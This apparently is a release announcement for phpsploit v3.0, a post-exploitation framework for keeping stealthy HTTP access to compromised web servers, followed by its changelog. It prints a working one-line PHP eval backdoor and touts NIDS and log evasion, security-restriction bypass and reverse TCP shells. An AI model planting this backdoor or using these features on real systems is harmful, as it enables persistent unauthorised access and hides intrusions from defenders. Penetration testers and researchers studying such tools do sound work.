phpsploit v3.0 releases: Stealth post-exploitation framework

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.


The obfuscated communication is accomplished using HTTP headers under standard client requests and web server’s relative responses, tunnelled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>


  • Efficient: More than 20 plugins to automate post-exploitation tasks
    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth: The framework is made by paranoids, for paranoids
    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient: A robust interface with many crucial features
    • Detailed help for any command or option (type help)
    • Cross-platform on both the client and the server.
    • Powerful interface with completion and multi-command support
    • Session saving/loading feature & persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Changelog v3.0

Implemented enhancements:

  • Add verbosity on tunnel handler #18
  • Add retrocompatibility for phpsploit v1 sessions (legacy version) #13
  • Improve session changes mechanism. #12
  • lrun cd \<DIRECTORY\> does not changes $PWD. #10
  • Add a ‘–browser’ option to phpinfo plugin for html display. #5
  • Create a stat plugin (which replaces old fileinfo) #4
  • Proposal: Add workaround for custom php error\_reporting level #3

Fixed bugs:

  • command: phpinfo --browse: BUG #34
  • Regression on Phpcode() datatype after Code() wrapper implementation #16
  • set \<SETTING\> + dont checks new added value, resulting to unexpected bugs. #15
  • Dynamic HTTP_* header settings cannot be unset. #11
  • lrun cd \\<DIRECTORY\\> does not changes $PWD. #10
  • Unlike unix’s ls command, the ls plugin leaves at first invalid path #1

Closed issues:

  • Unknown Command #52
  • Changes in data/config/config not loaded #49
  • Upload error #48
  • post parameter for target #47
  • Key Error: ADDR #36
  • Bad return value for exploit --get-backdoor #35
  • ‘corectl reload-plugins’ #30
  • interface: autocompletion bug with commands containing ‘-‘ char #28
  • setting an https url auto sets port to 80 instead of 443 as normally wanted #26
  • exploit command alters ENV without asking #24
  • [PHP 5.2.17 / Microsoft-IIS 8.0] HTTP headers with ‘_’ not converted into $_SERVER vars #23
  • Python help #22
  • Architecture issue: Organising decorators. #20
  • No deterministic component display order on session command. #17
  • History size issue (very slow loop) #14
  • Add support for http_proxy like env vars on unix platforms #6

Merged pull requests:


git clone

Copyright (C) nil0x42